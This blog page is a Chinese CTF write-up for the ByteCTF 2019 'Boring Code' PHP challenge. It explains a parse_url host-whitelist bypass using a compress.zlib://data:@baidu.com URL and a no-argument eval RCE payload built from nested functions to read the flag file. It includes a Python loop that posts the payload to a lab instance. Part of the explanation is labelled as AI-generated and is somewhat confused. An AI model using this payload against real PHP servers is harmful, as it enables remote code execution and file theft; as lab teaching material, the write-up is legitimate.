
  <!DOCTYPE html>
  <html lang="zh-CN"  
    
      data-theme-mode="auto"
    
  >
  <head>
  
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_0khxww3tj3q9';window.REIMU_CONFIG.clipboard_tips = {"success":{"en":"Copy successfully (*^▽^*)","zh-CN":"复制成功 (*^▽^*)","zh-TW":"複製成功 (*^▽^*)","ja":"コピー成功 (*^▽^*)"},"fail":{"en":"Copy failed (ﾟ⊿ﾟ)ﾂ","zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ","zh-TW":"複製失敗 (ﾟ⊿ﾟ)ﾂ","ja":"コピー失敗 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://dada-06.github.io';</script>
  
  <title>
    ByteCTF 2019 Boring Code |
    
    达达
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
  
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_0khxww3tj3q9.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="这题考了无参数rce   伪协议读取  flag就在主目录下 &#x2F;code里的源码  解释过滤了data:&#x2F;&#x2F; 有个parse_url($url)函数 检测url的host部分  是不是baidu.com 然后下面是无参 最终执行eval($code) 这里通过compress.zlib:&#x2F;&#x2F;伪协议进行文件读取 可以分解为：  compress.zl">
<meta property="og:type" content="article">
<meta property="og:title" content="ByteCTF 2019 Boring Code">
<meta property="og:url" content="http://dada-06.github.io/2025/05/28/Boring%20Code/index.html">
<meta property="og:site_name" content="达达">
<meta property="og:description" content="这题考了无参数rce   伪协议读取  flag就在主目录下 &#x2F;code里的源码  解释过滤了data:&#x2F;&#x2F; 有个parse_url($url)函数 检测url的host部分  是不是baidu.com 然后下面是无参 最终执行eval($code) 这里通过compress.zlib:&#x2F;&#x2F;伪协议进行文件读取 可以分解为：  compress.zl">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528211913878.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528212001760.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528215530836.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528220105869.png">
<meta property="article:published_time" content="2025-05-28T14:07:59.345Z">
<meta property="article:modified_time" content="2025-05-28T15:03:20.322Z">
<meta property="article:author" content="达达">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528211913878.png">
  
  
    <link rel="alternate" href="/atom.xml" title="达达" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload&#x3D;null;this.rel&#x3D;&#39;stylesheet&#39;" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL&#x2F;toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx&#x2F;1oA&#x2F;0l8ysE" crossorigin="anonymous">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css" integrity="sha384-4NN3fZ5AokFyHuoihl7A9qWaCt+HsAtOaUsXwJGRb4&#x2F;SMBtFr2vcNSHR5E8dg0Wk" crossorigin="anonymous">

  
  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      
      
        
      
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
  
</div>
<header id="header">
  
    <picture></picture>
    <img  fetchpriority="high" src="/../covers/6.png" alt="ByteCTF 2019 Boring Code">
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">ByteCTF 2019 Boring Code</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        
          <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E9%87%8A"><span class="toc-number">1.</span> <span class="toc-text">解释</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#parse-url-url-%E8%A7%A3%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">parse_url($url)解析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file-get-contents-url-%E4%BC%9A%E5%B9%B2%E5%98%9B"><span class="toc-number">3.</span> <span class="toc-text">file_get_contents($url) 会干嘛?</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%AC%E8%B4%A8%E4%B8%8A%E6%98%AF%E8%BF%99%E6%A0%B7%E7%90%86%E8%A7%A3%E7%9A%84%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">本质上是这样理解的：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9D%97-%E9%87%8D%E7%82%B9%EF%BC%9A%E4%BD%A0%E4%BC%A0%E7%9A%84%E5%85%B6%E5%AE%9E%E4%B8%8D%E6%98%AF%E6%9C%89%E6%95%88%E7%9A%84%E5%8E%8B%E7%BC%A9%E6%95%B0%E6%8D%AE%EF%BC%81"><span class="toc-number">3.2.</span> <span class="toc-text">❗ 重点：你传的其实不是有效的压缩数据！</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%F0%9F%9A%A8-%E6%89%80%E4%BB%A5%E6%9C%80%E7%BB%88%E4%BC%9A%E8%A7%A3%E6%9E%90%E6%88%90%EF%BC%9A"><span class="toc-number">3.3.</span> <span class="toc-text">🚨 所以最终会解析成：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9C%85-%E4%BD%86%E6%98%AF%E4%BD%A0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E5%AE%83%EF%BC%9F"><span class="toc-number">3.4.</span> <span class="toc-text">✅ 但是你为什么还可以利用它？</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9C%85-%E6%80%BB%E7%BB%93%EF%BC%9A%E8%BF%99%E4%B8%AA-payload-%E4%BC%9A%E8%A2%AB%E8%A7%A3%E6%9E%90%E6%88%90"><span class="toc-number">3.5.</span> <span class="toc-text">✅ 总结：这个 payload 会被解析成</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%8F%82rce%E8%A7%A3%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">无参rce解析</span></a></li></ol>
      
  </div>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="达达" class="lazyload">
  <div class="sidebar-author-name">达达</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">14</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
        
      
      
        
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
        
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
  
</aside>

          <section id="main"><article id="post-Boring Code" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-05-28T14:07:59.345Z" itemprop="datePublished">2025-05-28</time>
    <time style="display: none;" id="post-update-time">2025-05-28</time>
  </span>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <p>这题考了无参数rce   伪协议读取</p>
<p><img src="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528211913878.png" alt="image-20250528211913760"></p>
<p>flag就在主目录下</p>
<p>&#x2F;code里的源码</p>
<p><img src="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528212001760.png" alt="image-20250528212001684"></p>
<h3 id="解释"><a href="#解释" class="headerlink" title="解释"></a>解释</h3><p><strong>过滤了data:&#x2F;&#x2F;</strong></p>
<p><strong>有个parse_url($url)函数</strong></p>
<p><strong>检测url的host部分  是不是baidu.com</strong></p>
<p><strong>然后下面是无参</strong></p>
<p><strong>最终执行eval($code)</strong></p>
<p><strong>这里通过compress.zlib:&#x2F;&#x2F;伪协议进行文件读取</strong></p>
<p>可以分解为：</p>
<ul>
<li><code>compress.zlib://</code> → 这是 PHP 的流封装器，用于处理 <strong>zlib 压缩</strong> 的数据流（<code>.gz</code> 格式）。</li>
<li><code>data:</code> → 这是 <strong><code>data</code> URI scheme</strong>，可以内嵌数据而非从文件或网络读取，常用于嵌入 base64 数据。</li>
</ul>
<p>你可以把它理解为：</p>
<blockquote>
<p>“把 base64 编码的内联数据当成 gzip 文件读取”</p>
</blockquote>
<p>但是这里我们不需要base64编码</p>
<p>怎么使host&#x3D;baidu.com</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=compress.zlib://data:@baidu.com/plain,...</span><br></pre></td></tr></table></figure>

<p>这里通过compress.zlib:&#x2F;&#x2F;伪协议   …会被当做php代码执行</p>
<h3 id="parse-url-url-解析"><a href="#parse-url-url-解析" class="headerlink" title="parse_url($url)解析"></a><strong>parse_url($url)解析</strong></h3><p><code>parse_url()</code> 是 PHP 的一个内置函数，它把 URL 字符串解析成数组，包括这些部分：</p>
<ul>
<li><code>scheme</code>（协议）</li>
<li><code>host</code>（主机）</li>
<li><code>path</code>（路径）</li>
<li><code>query</code>（查询参数）</li>
<li>等等</li>
</ul>
<p>举个例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">parse_url(&quot;http://admin:pass@baidu.com/index.php?id=1&quot;);</span><br></pre></td></tr></table></figure>

<p>会得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[</span><br><span class="line">  &quot;scheme&quot; =&gt; &quot;http&quot;,</span><br><span class="line">  &quot;host&quot; =&gt; &quot;baidu.com&quot;,</span><br><span class="line">  &quot;user&quot; =&gt; &quot;admin&quot;,</span><br><span class="line">  &quot;pass&quot; =&gt; &quot;pass&quot;,</span><br><span class="line">  &quot;path&quot; =&gt; &quot;/index.php&quot;,</span><br><span class="line">  &quot;query&quot; =&gt; &quot;id=1&quot;</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>那么</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">parse_url(&quot;compress.zlib://data:@baidu.com/plain,...&quot;);</span><br></pre></td></tr></table></figure>

<p>就会被解析为</p>
<p>[</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">  &#x27;scheme&#x27; =&gt; &#x27;compress.zlib&#x27;,</span><br><span class="line">  &#x27;host&#x27;   =&gt; &#x27;baidu.com&#x27;,</span><br><span class="line">  &#x27;user&#x27;   =&gt; &#x27;data&#x27;,</span><br><span class="line">  &#x27;path&#x27;   =&gt; &#x27;/plain,echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));&#x27;</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>从而绕过preg_match(‘&#x2F;baidu.com$&#x2F;‘, $r[‘host’])</p>
<h3 id="file-get-contents-url-会干嘛"><a href="#file-get-contents-url-会干嘛" class="headerlink" title="file_get_contents($url) 会干嘛?"></a><code>file_get_contents($url)</code> 会干嘛?</h3><p><code>file_get_contents()</code> 会尝试打开：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">compress.zlib://data:@baidu.com/plain,echo(readfile(...));</span><br></pre></td></tr></table></figure>

<h4 id="本质上是这样理解的："><a href="#本质上是这样理解的：" class="headerlink" title="本质上是这样理解的："></a>本质上是这样理解的：</h4><p>你让 PHP 打开一个以 zlib 格式压缩的文件流，它的位置是这个“伪造的路径”：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data:@baidu.com/plain,echo(readfile(...));</span><br></pre></td></tr></table></figure>

<p>但是！<strong>这个路径并不是真的访问网络地址或文件系统，而是一个伪造的字符串路径</strong>。</p>
<p>所以本质上是：</p>
<blockquote>
<p>“打开名为 <code>data:@baidu.com/plain,echo(readfile(...));</code> 的文件，并用 zlib 解压。”</p>
</blockquote>
<hr>
<h4 id="❗-重点：你传的其实不是有效的压缩数据！"><a href="#❗-重点：你传的其实不是有效的压缩数据！" class="headerlink" title="❗ 重点：你传的其实不是有效的压缩数据！"></a>❗ 重点：你传的其实不是有效的压缩数据！</h4><p>所以当 PHP 去读这个“伪资源”时，会失败 —— 除非：</p>
<ul>
<li>这个路径是你控制的真实压缩数据文件路径，或</li>
<li>你控制了服务器端怎样处理 <code>compress.zlib://</code>（例如绕过检查等）</li>
</ul>
<hr>
<h4 id="🚨-所以最终会解析成："><a href="#🚨-所以最终会解析成：" class="headerlink" title="🚨 所以最终会解析成："></a>🚨 所以最终会解析成：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$code = file_get_contents(&quot;compress.zlib://data:@baidu.com/plain,echo(readfile(...));&quot;);</span><br></pre></td></tr></table></figure>

<p>并尝试把读取的内容 <code>zlib</code> 解压。除非：</p>
<ul>
<li>你有写入 <code>/plain,...</code> 这个路径的权限并能生成有效 zlib 压缩流</li>
<li>或者服务器的 <code>file_get_contents()</code> 实际没有执行真正的解压</li>
</ul>
<p>否则 PHP 会报错，比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Warning: file_get_contents(): zlib: data error</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="✅-但是你为什么还可以利用它？"><a href="#✅-但是你为什么还可以利用它？" class="headerlink" title="✅ 但是你为什么还可以利用它？"></a>✅ 但是你为什么还可以利用它？</h4><p>你的目标可能并不是让 PHP 真正“读取一个有效的 zlib 文件”，而是：</p>
<ol>
<li>伪造一个合法的 URL（通过 <code>filter_var()</code>）</li>
<li>绕过 <code>preg_match(&#39;/data:\/\//&#39;)</code> 检查（因为你用的是 <code>compress.zlib://data:</code>）</li>
<li>利用 <code>@baidu.com</code> 让 <code>parse_url()</code> 得到 <code>host = baidu.com</code>，绕过 host 白名单</li>
<li>利用某种漏洞（比如没有真正执行解压）来执行 eval 的 payload 内容</li>
</ol>
<hr>
<h4 id="✅-总结：这个-payload-会被解析成"><a href="#✅-总结：这个-payload-会被解析成" class="headerlink" title="✅ 总结：这个 payload 会被解析成"></a>✅ 总结：这个 payload 会被解析成</h4><table>
<thead>
<tr>
<th>部分</th>
<th>解析结果</th>
</tr>
</thead>
<tbody><tr>
<td>scheme</td>
<td><code>compress.zlib</code></td>
</tr>
<tr>
<td>user</td>
<td><code>data</code></td>
</tr>
<tr>
<td>host</td>
<td><code>baidu.com</code></td>
</tr>
<tr>
<td>path</td>
<td><code>/plain,echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));</code></td>
</tr>
<tr>
<td><code>file_get_contents</code></td>
<td>尝试打开此路径并解压：<code>&quot;compress.zlib://data:@baidu.com/plain,echo(...));&quot;</code></td>
</tr>
<tr>
<td><code>eval($code)</code></td>
<td>如果这个内容被成功读取，且通过函数嵌套校验和黑名单校验，则会被执行。</td>
</tr>
</tbody></table>
<p><strong>上面是ai解释的</strong></p>
<p>总之就是eval会成功执行$code&#x3D;echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));吧</p>
<p>compress.zlib:&#x2F;&#x2F;…会被<code>file_get_contents()</code> 用来“取回要 eval 的内容”。这个内容必须是合法的 PHP 表达式（满足嵌套函数+不过黑名单）。</p>
<p>即$code是 <code>file_get_contents($url)</code> 的返回内容 &#x3D; 你嵌入的 <code>echo(...)</code> 代码</p>
<p>下面是一个无参rce绕过  执行eval($code)</p>
<p>这里主要是获得主目录的文件</p>
<p>paylaod:</p>
<p>url&#x3D;compress.zlib:&#x2F;&#x2F;data:@baidu.com&#x2F;plain,echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));</p>
<h3 id="无参rce解析"><a href="#无参rce解析" class="headerlink" title="无参rce解析"></a>无参rce解析</h3><p>localeconv()查看当前目录文件名</p>
<p>pos  取数组的第一项    即  .</p>
<p>scandir()——列出指定路径中的文件和目录(php5,7,8)</p>
<p>next将数组中的内部指针向前移动（其实就是到了数组里的下一个键和值）  这里是   ..</p>
<p>chdir()<strong>切换当前工作目录</strong>   这里切换到   ..  即上级目录</p>
<p>然后接着是通过读取时间戳  来获取   上级目录的   .    并通过scandir进行遍历</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chr(pos(localtime(time())))</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>time()</code>: 获取当前时间戳（如 <code>1717047000</code>）</p>
</li>
<li><p><code>localtime()</code>: 解析为时间数组 → <code>[秒, 分, 时, ...]</code></p>
</li>
<li><p><code>pos()</code>: 取第一个元素（<strong>秒数</strong>，范围 0-59）</p>
</li>
<li><pre><code>chr()
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">  : 将秒数转为ASCII字符</span><br><span class="line"></span><br><span class="line">  - 若秒数=47 → ASCII 47 = **`/`**（根目录符号）</span><br><span class="line">  - 若秒数=46 → ASCII 46 = **`.`**（当前目录符号）</span><br><span class="line"></span><br><span class="line">通过这里就已经遍历了主目录各个文件</span><br><span class="line"></span><br><span class="line">flag文件在最后一个元素   </span><br><span class="line"></span><br><span class="line">通过end读取    end()取数组最后一个元素   因为这里的flag在最后一个文件里   ctf题目的设计原因</span><br><span class="line"></span><br><span class="line">最后使用readgzfile进行文件读取</span><br><span class="line"></span><br><span class="line">因为要通过时间戳读取   当秒数为46  -&gt;  .   的时候才能够读取到flag</span><br><span class="line"></span><br><span class="line">所以读取的时候可以使用  bp进行爆破    多线程发包</span><br><span class="line"></span><br><span class="line">py脚本</span><br><span class="line"></span><br><span class="line">```py</span><br><span class="line">import requests</span><br><span class="line">import datetime</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = &quot;http://node4.anna.nssctf.cn:28969/code/&quot;</span><br><span class="line">data = &#123;</span><br><span class="line">    &quot;url&quot;: &quot;compress.zlib://data:@baidu.com/plain,echo(readgzfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">while True:</span><br><span class="line">    time.sleep(1)</span><br><span class="line">    print(&quot;成功发出请求，时间:&quot;, datetime.datetime.now().strftime(&#x27;%Y-%m-%d %H:%M:%S.%f&#x27;))</span><br><span class="line">    r = requests.post(url, data=data)</span><br><span class="line">    print(&quot;收到响应，时间:&quot;, datetime.datetime.now().strftime(&#x27;%Y-%m-%d %H:%M:%S.%f&#x27;))</span><br><span class="line">    print(f&quot;响应耗时: &#123;r.elapsed.total_seconds()&#125; 秒&quot;)</span><br><span class="line">    if &quot;flag&quot; in r.text:</span><br><span class="line">        print(&quot;响应内容:&quot;)</span><br><span class="line">        print(r.text)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528215530836.png" alt="image-20250528215530727"></p>
<p>可以看到收到响应的时间为   46秒时    可以得到flag</p>
<p>bp爆破  多线程发包读取</p>
<p><img src="https://cdn.jsdelivr.net/gh/csd0617/piclist@main/img/20250528220105869.png" alt="image-20250528220105750"></p>
<p>borin_code+</p>
<p>多过滤了readfile  time等   去看<a target="_blank" rel="noopener" href="https://www.cnblogs.com/BOHB-yunying/p/11616311.html%E5%B8%88%E5%82%85%E7%9A%84%E6%80%BB%E7%BB%93%E5%90%A7">https://www.cnblogs.com/BOHB-yunying/p/11616311.html师傅的总结吧</a></p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        <img data-src="/../covers/3.jpg" data-sizes="auto" alt="ssti模板注入" class="lazyload">
      
      <a href="/2025/05/27/ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          ssti模板注入
        
      </h3>
    </div>
    
  </nav>


</article>










</section>
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      
      
      
        2020-2025
      
      <span class="footer-info-sep rotate"></span>
      达达
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        45k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        03:13
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
